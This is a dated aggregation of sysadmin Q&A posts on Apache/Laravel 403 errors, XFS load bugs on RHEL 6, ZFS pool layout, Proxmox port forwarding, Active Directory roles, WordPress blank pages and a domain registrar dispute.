Sunday, April 30, 2017

windows - Laravel "public"-folder error 403 (forbidden) - using Uniform Server (Apache)

I'm trying to create my first MVC project with the help of the framework Laravel, using the server platform Uniform Server. (Uniform Server uses Apache.)



The problem is, I cannot seem to get my routes to work. I suspect this is because upon trying to access http://localhost/project_name/public/, I receive the following error:



Forbidden

You don't have permission to access /project_name/public/ on this server.



i.e. error 403.



After some research it seems that this is a .htaccess problem, or a problem with my server configuration. This is because, if I have understood things right, access is simply not being granted to the folder.



Sounds easy enough to fix, but none of the fixes I find seem to work, or do not apply to the server platform I use. I must be missing something.



Moreover, while browsing my folders in localhost, the public folder is not actually displayed, like the others. I "reach" it only by typing the path into the URL field. However the folder obviously exists there as I'm getting a 403 error and not 404. And of course it appears as it should in file explorer.







This is my .htaccess file:





Options -MultiViews -Indexes


RewriteEngine On

# Handle Authorization Header

RewriteCond %{HTTP:Authorization} .
RewriteRule .* - [E=HTTP_AUTHORIZATION:%{HTTP:Authorization}]

# Redirect Trailing Slashes If Not A Folder...
RewriteCond %{REQUEST_FILENAME} !-d
RewriteCond %{REQUEST_URI} (.+)/$
RewriteRule ^ %1 [L,R=301]

# Handle Front Controller...
RewriteCond %{REQUEST_FILENAME} !-d

RewriteCond %{REQUEST_FILENAME} !-f
RewriteRule ^ index.php [L]






And for Uniform Server, this is the httpd.conf file:



#############################################

### Uniform Server - Apache Configuration ###
#############################################

# Environment variable ${PHP_SELECT} has a value of php52,
# php53, php54, php55 or php56. It is used in the following
# five define statements to select a PHP version to
# load as a module.
Define ${PHP_SELECT}



Include ${US_ROOTF}/core/apache2/conf/extra_us/php53.conf



Include ${US_ROOTF}/core/apache2/conf/extra_us/php54.conf



Include ${US_ROOTF}/core/apache2/conf/extra_us/php55.conf




Include ${US_ROOTF}/core/apache2/conf/extra_us/php56.conf



Include ${US_ROOTF}/core/apache2/conf/extra_us/php70.conf




Include ${US_ROOTF}/core/apache2/conf/extra_us/php71.conf





#
# This is the main Apache HTTP server configuration file. It contains the
# configuration directives that give the server its instructions.
# See for detailed information.

# In particular, see
#
# for a discussion of each configuration directive.
#
# Configuration and logfile names: If the filenames you specify for many
# of the server's control files begin with "/" (or "drive:/" for Win32), the
# server will use that explicit path. If the filenames do *not* begin
# with "/", the value of ServerRoot is prepended -- so "logs/access_log"
# with ServerRoot set to "/usr/local/apache2" will be interpreted by the
# server as "/usr/local/apache2/logs/access_log", whereas "/logs/access_log"

# will be interpreted as '/logs/access_log'.
#

#
# ServerRoot: The top of the directory tree under which the server's
# configuration, error, and log files are kept.
#
# Do not add a slash at the end of the directory path. If you point
# ServerRoot at a non-local disk, be sure to specify a local disk on the
# Mutex directive, if file-based mutexes are used. If you wish to share the

# same ServerRoot for multiple httpd daemons, you will need to change at
# least PidFile.
#
AcceptFilter http none
EnableSendfile Off
EnableMMAP off

ServerRoot "${US_ROOTF}/core/apache2"
PidFile ${US_ROOTF}/core/apache2/logs/httpd.pid



#
# Listen: Allows you to bind Apache to specific IP addresses and/or
# ports, instead of the default. See also the
# directive.
#
# Change this to Listen on specific IP addresses as shown below to
# prevent Apache from glomming onto all bound IP addresses.
#
#Listen 12.34.56.78:80

Listen ${AP_PORT}

#
# Dynamic Shared Object (DSO) Support
#
# To be able to use the functionality of a module which was built as a DSO you
# have to place corresponding `LoadModule' lines at this location so the
# directives contained in it are actually available _before_ they are used.
# Statically compiled modules (those listed by `httpd -l') do not need
# to be loaded here.

#
# Example:
# LoadModule foo_module modules/mod_foo.so
#
LoadModule access_compat_module modules/mod_access_compat.so
LoadModule actions_module modules/mod_actions.so
LoadModule alias_module modules/mod_alias.so
LoadModule allowmethods_module modules/mod_allowmethods.so
LoadModule asis_module modules/mod_asis.so
LoadModule auth_basic_module modules/mod_auth_basic.so

#LoadModule auth_digest_module modules/mod_auth_digest.so
#LoadModule auth_form_module modules/mod_auth_form.so
#LoadModule authn_anon_module modules/mod_authn_anon.so
LoadModule authn_core_module modules/mod_authn_core.so
#LoadModule authn_dbd_module modules/mod_authn_dbd.so
#LoadModule authn_dbm_module modules/mod_authn_dbm.so
LoadModule authn_file_module modules/mod_authn_file.so
#LoadModule authn_socache_module modules/mod_authn_socache.so
#LoadModule authnz_fcgi_module modules/mod_authnz_fcgi.so
#LoadModule authnz_ldap_module modules/mod_authnz_ldap.so

LoadModule authz_core_module modules/mod_authz_core.so
#LoadModule authz_dbd_module modules/mod_authz_dbd.so
#LoadModule authz_dbm_module modules/mod_authz_dbm.so
LoadModule authz_groupfile_module modules/mod_authz_groupfile.so
LoadModule authz_host_module modules/mod_authz_host.so
#LoadModule authz_owner_module modules/mod_authz_owner.so
LoadModule authz_user_module modules/mod_authz_user.so
LoadModule autoindex_module modules/mod_autoindex.so
#LoadModule buffer_module modules/mod_buffer.so
#LoadModule cache_module modules/mod_cache.so

#LoadModule cache_disk_module modules/mod_cache_disk.so
#LoadModule cache_socache_module modules/mod_cache_socache.so
#LoadModule cern_meta_module modules/mod_cern_meta.so
LoadModule cgi_module modules/mod_cgi.so
#LoadModule charset_lite_module modules/mod_charset_lite.so
#LoadModule data_module modules/mod_data.so
LoadModule dav_module modules/mod_dav.so
LoadModule dav_fs_module modules/mod_dav_fs.so
#LoadModule dav_lock_module modules/mod_dav_lock.so
#LoadModule dbd_module modules/mod_dbd.so

LoadModule deflate_module modules/mod_deflate.so
LoadModule dir_module modules/mod_dir.so
#LoadModule dumpio_module modules/mod_dumpio.so
LoadModule env_module modules/mod_env.so
#LoadModule expires_module modules/mod_expires.so
#LoadModule ext_filter_module modules/mod_ext_filter.so
#LoadModule file_cache_module modules/mod_file_cache.so
LoadModule filter_module modules/mod_filter.so
#LoadModule http2_module modules/mod_http2.so
LoadModule headers_module modules/mod_headers.so

#LoadModule heartbeat_module modules/mod_heartbeat.so
#LoadModule heartmonitor_module modules/mod_heartmonitor.so
#LoadModule ident_module modules/mod_ident.so
#LoadModule imagemap_module modules/mod_imagemap.so
LoadModule include_module modules/mod_include.so
LoadModule info_module modules/mod_info.so
LoadModule isapi_module modules/mod_isapi.so
#LoadModule lbmethod_bybusyness_module modules/mod_lbmethod_bybusyness.so
#LoadModule lbmethod_byrequests_module modules/mod_lbmethod_byrequests.so
#LoadModule lbmethod_bytraffic_module modules/mod_lbmethod_bytraffic.so

#LoadModule lbmethod_heartbeat_module modules/mod_lbmethod_heartbeat.so
#LoadModule ldap_module modules/mod_ldap.so
#LoadModule logio_module modules/mod_logio.so
LoadModule log_config_module modules/mod_log_config.so
#LoadModule log_debug_module modules/mod_log_debug.so
#LoadModule log_forensic_module modules/mod_log_forensic.so
#LoadModule lua_module modules/mod_lua.so
#LoadModule macro_module modules/mod_macro.so
LoadModule mime_module modules/mod_mime.so
#LoadModule mime_magic_module modules/mod_mime_magic.so

LoadModule negotiation_module modules/mod_negotiation.so
#LoadModule proxy_module modules/mod_proxy.so
#LoadModule proxy_ajp_module modules/mod_proxy_ajp.so
#LoadModule proxy_balancer_module modules/mod_proxy_balancer.so
#LoadModule proxy_connect_module modules/mod_proxy_connect.so
#LoadModule proxy_express_module modules/mod_proxy_express.so
#LoadModule proxy_fcgi_module modules/mod_proxy_fcgi.so
#LoadModule proxy_ftp_module modules/mod_proxy_ftp.so
#LoadModule proxy_html_module modules/mod_proxy_html.so
#LoadModule proxy_http_module modules/mod_proxy_http.so

#LoadModule proxy_scgi_module modules/mod_proxy_scgi.so
#LoadModule proxy_wstunnel_module modules/mod_proxy_wstunnel.so
#LoadModule ratelimit_module modules/mod_ratelimit.so
#LoadModule reflector_module modules/mod_reflector.so
#LoadModule remoteip_module modules/mod_remoteip.so
#LoadModule request_module modules/mod_request.so
#LoadModule reqtimeout_module modules/mod_reqtimeout.so
LoadModule rewrite_module modules/mod_rewrite.so
#LoadModule sed_module modules/mod_sed.so
#LoadModule session_module modules/mod_session.so

#LoadModule session_cookie_module modules/mod_session_cookie.so
#LoadModule session_crypto_module modules/mod_session_crypto.so
#LoadModule session_dbd_module modules/mod_session_dbd.so
LoadModule setenvif_module modules/mod_setenvif.so
#LoadModule slotmem_plain_module modules/mod_slotmem_plain.so
#LoadModule slotmem_shm_module modules/mod_slotmem_shm.so
#LoadModule socache_dbm_module modules/mod_socache_dbm.so
#LoadModule socache_memcache_module modules/mod_socache_memcache.so
LoadModule socache_shmcb_module modules/mod_socache_shmcb.so
#LoadModule speling_module modules/mod_speling.so

#LoadModule ssl_module modules/mod_ssl.so
LoadModule status_module modules/mod_status.so
#LoadModule substitute_module modules/mod_substitute.so
#LoadModule unique_id_module modules/mod_unique_id.so
LoadModule userdir_module modules/mod_userdir.so
#LoadModule usertrack_module modules/mod_usertrack.so
LoadModule version_module modules/mod_version.so
LoadModule vhost_alias_module modules/mod_vhost_alias.so
#LoadModule watchdog_module modules/mod_watchdog.so
#LoadModule xml2enc_module modules/mod_xml2enc.so

#LoadModule plua_module modules/mod_plua.so


#Added new module

ProtocolsHonorOrder On
Protocols h2 http/1.1






User daemon
Group daemon



# 'Main' server configuration
#
# The directives in this section set up the values used by the 'main'

# server, which responds to any requests that aren't handled by a
# definition. These values also provide defaults for
# any containers you may define later in the file.
#
# All of these directives may appear inside containers,
# in which case these default settings will be overridden for the
# virtual host being defined.
#

#

# ServerAdmin: Your address, where problems with the server should be
# e-mailed. This address appears on some server-generated pages, such
# as error documents. e.g. admin@your-domain.com
#
ServerAdmin admin@${US_SERVERNAME}

#
# ServerName gives the name and port that the server uses to identify itself.
# This can often be determined automatically, but we recommend you specify
# it explicitly to prevent problems during startup.

#
# If your host doesn't have a registered DNS name, enter its IP address here.
#
#ServerName www.example.com:80
ServerName ${US_SERVERNAME}

#
# Deny access to the entirety of your server's filesystem. You must
# explicitly permit access to web content directories in other
# blocks below.

#


#mine
Options FollowSymLinks

AllowOverride all
#Require all denied



#
# Note that from this point forward you must specifically allow
# particular features to be enabled - so if something's not working as
# you might expect, make sure that you have specifically enabled it
# below.
#

#
# DocumentRoot: The directory out of which you will serve your
# documents. By default, all requests are taken from this directory, but

# symbolic links and aliases may be used to point to other locations.
#
DocumentRoot "${US_ROOTF_WWW}"

#
# Possible values for the Options directive are "None", "All",
# or any combination of:
# Indexes Includes FollowSymLinks SymLinksifOwnerMatch ExecCGI MultiViews
#
# Note that "MultiViews" must be named *explicitly* --- "Options All"

# doesn't give it to you.
#
# The Options directive is both complicated and important. Please see
# http://httpd.apache.org/docs/2.4/mod/core.html#options
# for more information.
#
#Options Indexes FollowSymLinks
Options Indexes Includes

#

# AllowOverride controls what directives may be placed in .htaccess files.
# It can be "All", "None", or any combination of the keywords:
# Options FileInfo AuthConfig Limit
#
AllowOverride All

#
# Controls who can get stuff from this server.
#
Require all granted



#
# DirectoryIndex: sets the file that Apache will serve if a directory
# is requested.
#

DirectoryIndex index.html index.shtml index.html.var index.htm index.php3 index.php index.lua index.pl index.cgi



#
# The following lines prevent .htaccess and .htpasswd files from being
# viewed by Web clients.
#

Require all denied


#
# ErrorLog: The location of the error log file.

# If you do not specify an ErrorLog directive within a
# container, error messages relating to that virtual host will be
# logged here. If you *do* define an error logfile for a
# container, that host's errors will be logged there and not here.
#
ErrorLog "logs/error.log"

#
# LogLevel: Control the number of messages logged to the error_log.
# Possible values include: debug, info, notice, warn, error, crit,

# alert, emerg.
#
LogLevel warn


#
# The following directives define some format nicknames for use with
# a CustomLog directive (see below).
#
LogFormat "%h %l %u %t \"%r\" %>s %b \"%{Referer}i\" \"%{User-Agent}i\"" combined

LogFormat "%h %l %u %t \"%r\" %>s %b" common
LogFormat "%{Referer}i -> %U" referer
LogFormat "%{User-agent}i" agent


# You need to enable mod_logio.c to use %I and %O
LogFormat "%h %l %u %t \"%r\" %>s %b \"%{Referer}i\" \"%{User-Agent}i\" %I %O" combinedio




#
# If you prefer a logfile with access, agent, and referer information
# (Combined Logfile Format) you can use the following directive.
#
CustomLog "logs/access.log" combined




Alias /us_docs "${US_ROOTF}/docs/"


#opt1>phpMyAdmin opt2>Adminer opt3>phpMyBaskupPro
Alias /us_opt1 "${US_ROOTF}/home/us_opt1/"
Alias /us_opt2 "${US_ROOTF}/home/us_opt2/"
Alias /us_opt3 "${US_ROOTF}/home/us_opt3/"
Alias /us_pac "${US_ROOTF}/home/us_pac/"

Alias /us_mongoadmin "${US_ROOTF}/home/us_mongoadmin/"
Alias /us_pear "${US_ROOTF}/home/us_pear/"
Alias /us_splash "${US_ROOTF}/home/us_splash/"

Alias /us_extra "${US_ROOTF}/home/us_extra/"
Alias /webalizer "${US_ROOTF}/webalizer/"
Alias /us_test_access "${US_ROOTF}/home/us_access/www/"

#
# ScriptAlias: This controls which directories contain server scripts.
# ScriptAliases are essentially the same as Aliases, except that
# documents in the target directory are treated as applications and
# run by the server when requested rather than as documents sent to the
# client. The same rules about trailing "/" apply to ScriptAlias

# directives as to Alias.
#
ScriptAlias /cgi-bin/ "${US_ROOTF}/cgi-bin/"




#
# ScriptSock: On threaded servers, designate the path to the UNIX
# socket used to communicate with the CGI daemon of mod_cgid.

#
#Scriptsock logs/cgisock



Options Indexes Includes
AllowOverride All
Require all granted



#== Default phpMyAdmin

Options Indexes Includes
AllowOverride All
Require all granted


#== Default Adminer

Options Indexes Includes

AllowOverride All
Require all granted


#== Default phpMyBackupPro

Options Indexes Includes
AllowOverride All
Require all granted



#== PAC - Location to serve proxy.pac

Options Indexes Includes
AllowOverride All
Require all granted





Options Indexes Includes
AllowOverride All
Require all granted



Options Indexes Includes
AllowOverride All
Require all granted




Options Indexes Includes
AllowOverride All
Require all granted



Options Indexes Includes
AllowOverride All

Require all granted



Options Indexes Includes
AllowOverride All
Require all granted




Require all granted


#
# "c:/Apache24/cgi-bin" should be changed to whatever your ScriptAliased
# CGI directory exists, if you have that configured.
#


AllowOverride All

Options ExecCGI
Require all granted



AllowOverride All
Options ExecCGI
Require all granted





#
# TypesConfig points to the file containing the list of mappings from
# filename extension to MIME-type.
#
TypesConfig conf/mime.types

#
# AddType allows you to add to or override the MIME configuration

# file specified in TypesConfig for specific file types.
#
#AddType application/x-gzip .tgz
#
# AddEncoding allows you to have certain browsers uncompress
# information on the fly. Note: Not all browsers support this.
#
#AddEncoding x-compress .Z
#AddEncoding x-gzip .gz .tgz
#

# If the AddEncoding directives above are commented-out, then you
# probably should define those extensions to indicate media types:
#
AddType application/x-compress .Z
AddType application/x-gzip .gz .tgz


AddType text/html .shtml
AddOutputFilter INCLUDES .shtml


# PAC files e.g proxy.pac
AddType application/x-ns-proxy-autoconfig .pac

#used for configuring auto detect setting using DNS
#AddType application/x-ns-proxy-autoconfig .dat






MIMEMagicFile conf/magic


# Supplemental configuration
#
# The configuration files in the conf/extra/ directory can be
# included to add extra features or to modify the default configuration of
# the server, or you may simply copy their contents here and change as
# necessary.


# Server-pool management (MPM specific)
Include conf/extra/httpd-mpm.conf

# Multi-language error messages
#Include conf/extra/httpd-multilang-errordoc.conf

# Fancy directory listings
Include conf/extra/httpd-autoindex.conf

# Language settings

#Include conf/extra/httpd-languages.conf

# User home directories
#Include conf/extra/httpd-userdir.conf

# Real-time info on requests and configuration
Include conf/extra/httpd-info.conf

##====== VIRTUAL HOST ===========
#To enable uncomment next line

#Include conf/extra/httpd-vhosts.conf

# Local access to the Apache HTTP Server Manual
#Include conf/extra/httpd-manual.conf

# Distributed authoring and versioning (WebDAV)
#Include conf/extra/httpd-dav.conf

# Various default settings
Include conf/extra/httpd-default.conf



# Secure (SSL/TLS) connections
Include conf/extra/httpd-ssl.conf


# Deflate Module configuration

Include conf/extra/httpd-deflate.conf



# FastCGI Module configuration

Include conf/extra/httpd-fcgid.conf


# Proxy Html Module configuration

Include conf/extra/httpd-proxy-html.conf



# Uptime Module configuration

Include conf/extra/httpd-uptime.conf


# Uniform Server Lua config

Include conf/extra/us_lua.conf



# Uniform Server pLua config

Include conf/extra/us_plua.conf


# Secure (SSL/TLS) connections
#Include conf/extra/httpd-ssl.conf
#
# Note: The following must must be present to support

# starting without SSL on platforms with no /dev/random equivalent
# but a statically compiled-in mod_ssl.
#

SSLRandomSeed startup builtin
SSLRandomSeed connect builtin



ThreadStackSize 8888888







EDIT 1:



I checked my apache error log and found this:





[Fri Dec 01 12:24:50.572746 2017] [rewrite:error] [pid 20384:tid 1844]
[client ::1:60851] AH00670: Options FollowSymLinks and
SymLinksIfOwnerMatch are both off, so the RewriteRule directive is
also forbidden due to its similar ability to circumvent directory
restrictions :
C:/Users/Admin/Uniform/UniServerZ/www/project_name/public/




Aha! So perhaps it is indeed my server configuration?

Is there a locally hosted service (similar to Pingdom) for monitoring uptime/response time?











I'm looking for something to monitor intranet apps and internal web services, and provide logs of historical response times, uptime, alerts if the system becomes unavailable...



In short, I'm looking for something that's almost identical to Pingdom, but which can be run on an internal monitoring server so we don't have to expose our intranet pages and API endpoints to the outside world.




Open source, commercial, free - doesn't really matter. Just curious to know what's out there!


Answer



Yeap- there are tons, some examples:



http://community.zenoss.org/
http://www.zabbix.com/
http://www.nagios.org


Friday, April 28, 2017

linux - The XFS filesystem is broken in RHEL/CentOS 6.x - What can I do about it?



Recent versions of RHEL/CentOS (EL6) brought some interesting changes to the XFS filesystem I've depended on heavily for over a decade. I spent part of last summer chasing down an XFS sparse file situation resulting from a poorly-documented kernel backport. Others have had unfortunate performance issues or inconsistent behavior since moving to EL6.




XFS was my default filesystem for data and growth-partitions, as it offered stability, scalability and a good performance boost over the default ext3 filesystems.



There's an issue with XFS on EL6 systems that surfaced in November 2012. I noticed that my servers were showing abnormaly-high system loads, even when idle. In one case, an unloaded system would show a constant load average of 3+. In others, there was a 1+ bump in load. The number of mounted XFS filesystems seemed to influence the severity of the load increase.



System has two active XFS filesystems. Load is +2 following upgrade to the affected kernel.
enter image description here



Digging deeper, I found a few threads on the XFS mailing list that pointed to an increased frequency of the xfsaild process sitting in the STAT D state. The corresponding CentOS Bug Tracker and Red Hat Bugzilla entries outline the specifics of the issue and conclude that this is not a performance problem; only an error in the reporting of system load in kernels newer than 2.6.32-279.14.1.el6.



WTF?!?




In a one-off situation, I understand that the load reporting may not be a big deal. Try managing that with your NMS and hundreds or thousands of servers! This was identified in November 2012 at kernel 2.6.32-279.14.1.el6 under EL6.3. Kernels 2.6.32-279.19.1.el6 and 2.6.32-279.22.1.el6 were released in subsequent months (December 2012 and February 2013) with no change to this behavior. There's even been a new minor release of the operating system since this issue was identified. EL6.4 was released and is now on kernel 2.6.32-358.2.1.el6, which exhibits the same behavior.



I've had a new system build queue and have had to work around the issue, either locking kernel versions at the pre-November 2012 release for EL6.3 or just not using XFS, opting for ext4 or ZFS, at a severe performance penalty for the specific custom application running atop. The application in question relies heavily on some of the XFS filesystem attributes to account for deficiencies in the application design.



Going behind Red Hat's paywalled knowledgebase site, an entry appears stating:




High load average is observed after installing kernel
2.6.32-279.14.1.el6. The high load average is caused by xfsaild going into D state for each XFS formatted device.




There is currently no resolution for this issue. It is currently being
tracked via Bugzilla #883905. Workaround Downgrade the installed
kernel package to a version lower then 2.6.32-279.14.1.




(except downgrading kernels not an option on RHEL 6.4...)



So we're 4+ months into this problem with no real fix planned for the EL6.3 or EL6.4 OS releases. There's a proposed fix for EL6.5 and a kernel source patch available... But my question is:




At what point does it make sense to depart from the OS-provided kernels and packages when the upstream maintainer has broken an important feature?



Red Hat introduced this bug. They should incorporate a fix into an errata kernel. One of the advantages of using enterprise operating systems is that they provide a consistent and predictable platform target. This bug disrupted systems already in production during a patch cycle and reduced confidence in deploying new systems. While I could apply one of the proposed patches to the source code, how scalable is that? It would require some vigilance to keep updated as the OS changes.



What's the right move here?




  • We know this could possibly be fixed, but not when.

  • Supporting your own kernel in a Red Hat ecosystem has its own set of caveats.

  • What's the impact on support eligibility?


  • Should I just overlay a working EL6.3 kernel on top of newly-build EL6.4 servers to gain the proper XFS functionality?

  • Should I just wait until this is officially fixed?

  • What does this say about the lack of control we have over enterprise Linux release cycles?

  • Was relying on an XFS filesystem for so long a planning/design mistake?



Edit:



This patch was incorporated into the most recent CentOSPlus kernel release (kernel-2.6.32-358.2.1.el6.centos.plus). I'm testing this on my CentOS systems, but this doesn't help much for the Red Hat-based servers.


Answer





At what point does it make sense to depart from the OS-provided kernels and packages when the upstream maintainer has broken an important feature?




"At the point where the vendor's kernel or packages are so horribly broken that they impact your business" is my general answer (coincidentally this is also about the point where I say it makes sense to start looking at ways to depart from the vendor relationship).



Basically as you and others have said, RedHat seems to not want to patch this in their distributed kernel (for whatever reason). That pretty much leaves you in the situation of having to roll your own kernel (keeping it up to date on patches yourself, maintaining your own package and installing it on your systems with Puppet or similar, or running a package server that Yum or whatever they use today can reference), or taking your marbles and going home.







Yes I know taking your marbles and going home is often an expensive proposition -- switching OS vendors is a huge pain, especially in the Linux world where the flavors are radically different from an administrative standpoint.
Other options like going totally CentOS are also unappealing (because you lose support, and you're still getting essentially RedHat's code built by someone else so you'd still have this bug).



Unfortunately unless enough people (i.e. "huge companies) take their marbles and go home the vendor won't care so much about screwing people over by shipping bad code and not fixing it.


Thursday, April 27, 2017

ZFS sample config opinions

Irecently asked a question about the best way to apply 20 2TB drives in a ZFS pool. I have come up with the following setup (thanks to many helpful suggestions) and would love opinions and suggestions about what I may have missed.



I have two SATA controllers (controller1 & controller2) that have the following disks attached:




  • controller



    • disk1

    • disk3

    • disk5

    • disk7

    • spare1


  • controller2



    • disk2

    • disk4

    • disk6

    • disk8

    • spare2




My thought was to create the pool using mirror pairs of disks, one disk each from each controller; ie:





  • mirror1: disk1 & disk2

  • mirror2: disk3 & disk4, etc



The two spare drives would give me some redundancy and also having the mirrors made up of disks from each controller should give me some redundancy as well.



Have I missed anything? Ii feel like I can grow the pool with little fuss by adding mirrored pairs and also more redundancy by added spare pairs.



I feel like this would give me a good balance of speed and redundacy.




Thoughts welcome and appreciated.

Wednesday, April 26, 2017

ssd - HP Proliant DL360 G9 with Samsung 983 DCT

I have a HP Proliant DL360 G9 (with P440ar storage controller). I would like to know whether it is possible to connect NVMe U.2 SSD? The SSD I was thinking about is Samsung 983 DCT.



I'm not sure how to determine whether the controller supports U.2. It only specifies that it supports SAS/SATA, and that is has a PCI Express Gen3 x 8 link.




Another thing - does the controller determine the backplane connectors? Or are those two separate items?

domain - Active Directory Subdomain vs new "Tree in Forest" ... is there a difference?

We have the forest named "company.com" and are debating between "thing.company.com" versus "thing.local". My understanding is that the latter is called a "Tree in a Forest"



What are the deciding criteria that will help me choose which is better? Is there any security, management, or GPO setting that favors one over the other?

Tuesday, April 25, 2017

windows server 2003 - Cannot transfer Schema role to another Domain Controller



I've inherited a small data center that is setup with two domain controllers. The first domain controller (that is home to the five operational masters roles (win2003server) is an older server and I want to move the operational masters to the other domain controller server (win2003r2 server).



When I go to the Active Directory Scheme mmc plug-in, and go to Operations Master, the Change button is greyed out. Do I need to move the other roles first prior to moving the Schema Master role or is this greyed out for another reason?


Answer




You are likely not a member of the Schema Admins group. You need that group membership to transfer the schema master role.


Monday, April 24, 2017

Can you update HP firmware via iLO virtual disk?

Simple question - can you do this? Right now we have a server in a remote data center with no ability to get anyone on site. We recently had a HP tech there to swap out a failed disk, however the disk is now refusing to rebuild. Apparently there may be some issues with the firmware rev, but there's no way we can get a DVD out there in a timeframe we're comfortable with. I do have the DVD firmware-update iso though, and I'm staring at the remote console just wondering.



Obviously I won't be updating iLO, but the other firmware.

How to ugrade to openssl 1.0.2 within ubuntu 14.04 LTS

I need to upgrade Openssl to 1.0.2 to get a certain feature. This worked following this tutorial http://www.miguelvallejo.com/updating-to-openssl-1-0-2g-on-ubuntu-server-12-04-14-04-lts-to-stop-cve-2016-0800-drown-attack/ However, HAProxy for example is still built with the old openssl version and thus does not support the ssl feature I need



How do I upgrade without compiling? I tried apt-get update and upgrade and also dist-upgrade. All that did not bring me to version 1.0.2

Sunday, April 23, 2017

iptables - Port forwarding from a single public ip for VM Client ( proxmox under debian )




I have a port forwarding problem with Proxmox under Debian.



I have two interfaces ( eth0 and vmbr2 ), how can I access to my client VM ( web server ) from external network by forwarding from a single public IP ?



I did some bad configuration I think on /etc/network/interfaces



Here's my interfaces :



auto eth0

iface eth0 inet static
address xxx.xxx.xxx.xxx
netmask 255.255.255.224
gateway xxx.xxx.xxx.xxx
up route add -net xxx.xxx.xxx.xxx netmask 255.255.255.224 gw xxx.xxx.xxx.xxx eth0


end for vmbr2 interface :



auto vmbr2

#private sub network
iface vmbr2 inet static
address 192.168.100.254
netmask 255.255.255.0
bridge_ports none
bridge_stp off
bridge_fd 0

post-up echo 1 > /proc/sys/net/ipv4/ip_forward
post-up iptables -t nat -A POSTROUTING -s '192.168.100.0/24' -o eth0 -j ACCEPT

post-down iptables -t nat -D POSTROUTING -s '192.168.100.0/24' -o eth0 -j ACCEPT

post-up iptables -t nat -A PREROUTING -i eth0 -p tcp --dport 2222 -j DNAT --to 192.168.100.6:22
post-down iptables -t nat -D PREROUTING -i eth0 -p tcp --dport 2222 -j DNAT --to 192.168.100.6:22


Thank you very much for your help


Answer



Just replace "ACCEPT" to "MASQUERADE" in the POSTROUTING rule.


x11 - ssh -X How to return a remote forwarded X application to localhost



I'm using Mac OS X 10.6.4
I'm opening an ssh session to a remote system running Ubuntu 10.0.4 Desktop



I open a remote VPN connection to a remote network
Then:
ssh -X user@host
screen -S openvas
sudo OpenVAS-Client #OpenVAS-Client GUI then forwards to my remote desktop



I want to configure and launch a scan in the OpenVAS GUI remotely over the ssh -X session. After I've launched the scan I want to send the OpenVAS-Client GUI back to its localhost, detach from my screen session, close the ssh session, and close the VPN connection. Hours later I want to be able to open the VPN connection again, ssh -X back into the remote computer, re-attach to the screen session, and bring the OpenVAS-Client back to my remote computer to look at the progress of the scan.



Is this possible?
Can someone point me in the direction of what commands and options to choose?




Thanks in advance.



Note: I don't really want to use VNC. I had installed NX and it worked in the lab but I can't log in over the VPN so that's a different problem.


Answer



Have a look at Xpra, it allows you to "detach" from and "reattach" to running X applications.


Saturday, April 22, 2017

debugging - Server does not load WordPress - No HTML nor PHP Errors



I just switched my Dreamhost WordPress site on my VPS from PHP 5.2 Fast CGI to 5.3 CGI. Somehow WordPress now refuses to load and shows a white screen of death on all WordPress pages. PHP Info and static HTML load just fine



I discussed some possible solutions with a support staff at Dreamhost, but no results as of yet. I have done the following:




  • I have switched to the Twentyeleven default theme

  • I have disabled all plugins using PHPMyAdmin.

  • I also created a phprc like this to log PHP errors, but none are loaded there at the moment.




PHP is loaded as I did verify that using a phpinfo() and it also showed my phprc is loaded as additional ini



When I load home I get an HTTP 200 and a white screen of death, but no errors whatsoever. How can I debug this further to fix this issue?



Update



It was the caching plugin W3T Total Cache that was causing the issue. Once I removed some core files the site came back with the base theme and all plugins deactivated. Somehow the plugin was still causing major issue even when it was turned off. Perhaps there were still details left in the database




The reason why I did not see any PHP errors is not clear as of yet. I am still investigating this. Also got an XCache_get function error, but that is perhaps because the XCache is not part of the PHP 5.3 package.


Answer



We see from your error log that your WordPress plugin is trying to call a function from XCache, but your new version of PHP doesn't include XCache.



To resolve the issue, install XCache for the new version of PHP.


Friday, April 21, 2017

How to serve Rails application with Passenger/Apache without domain name?

I am trying to serve a Rails application using Passenger and Apache on a Ubuntu server.



The Passenger installation instructions say I should add the following to my Apache configuration file - I assume this is /etc/apache2/httpd.conf.





ServerName www.yourhost.com
DocumentRoot /somewhere/public # <-- be sure to point to 'public'!

AllowOverride all # <-- relax Apache security settings
Options -MultiViews # <-- MultiViews must be turned off





However, I do not yet have a domain pointing at my server, so I'm not sure what I should put for the ServerName parameter. I have tried the IP address, but when I do that, restarting Apache gives



apache2: Could not reliably determine the server's fully qualified domain name, using 127.0.1.1 for ServerName
[Sun Jan 17 12:49:26 2010] [error] VirtualHost *:80 -- mixing * ports and non-* ports with a NameVirtualHost address is not supported, proceeding with undefined results
apache2: Could not reliably determine the server's fully qualified domain name, using 127.0.1.1 for ServerName
[Sun Jan 17 12:49:36 2010] [error] VirtualHost *:80 -- mixing * ports and non-* ports with a NameVirtualHost address is not supported, proceeding with undefined results


and pointing the browser at the IP address gives a 500 Internal Server Error.




The closest I have got to something sensible is with




ServerName efate
DocumentRoot /root/jpf/public

AllowOverride all
Options -MultiViews





where "efate" is my server's host name. But now pointing my browser at the server's IP address just gives a page saying "It works!" - presumably this is a default page, but I'm not sure where this is being served from.



I might be wrong in thinking that the reason I have been unable to get this to work is related to not having a domain name. This is the first time I have used Apache directly - any help would be most gratefully received!

Does 31 necessarily imply the end of the month in a cron job?

For cron job we know we can set time as below.



# +------------ Minute (0 - 59)
# | +---------- Hour (0 - 23)

# | | +-------- Day of the Month (1 - 31)
# | | | +------ Month (1 - 12)
# | | | | +---- Day of the Week (0 - 7) (Sunday is 0 or 7)
# | | | | |
# * * * * * command


What I want to know is that when we set day of the month 31, does this means the end of each month though the month does not have day 31. Hope to get answer.



Thanks in advance

Nameservers for Open SRS - who is accountable for my domain?






I purchased the "release" of a domain from a domain provider who was also hosting the corresponding website.



I was given an account to log-in to at opensrs.net.



I pointed the domain to different nameservers to allow me to host it myself.






Now, several months later, the client received a renewal domain notice from the original domain provider. They advised the client to ignore the notice because payment was good until 2014. Days later, the domain is suspended, the nameservers were changed to RENEWYOURNAME.NET and has now gone into redemption meaning it's unavailable for 40 days.



The original domain provider insists that they are no longer responsible for the domain.





Who is managing my domain? Who is payment due to? Who cancelled the account and changed the nameservers?



WHOIS data suggest that it's http://www.tucowsdomains.com/ who is a reseller of http://www.opensrs.com/.




Tuscow Domains clearly identify the original domain provider as the current provider. Open SRS, through their control panel identify the same. The original domain provider denies responsibility.


Answer




Who is managing my domain?




From the sounds of it, nobody. According to whois, Tucows Domains is the registrar? Then Tucows Domains is the only company with permission to change the nameservers to "renewyourname.net".



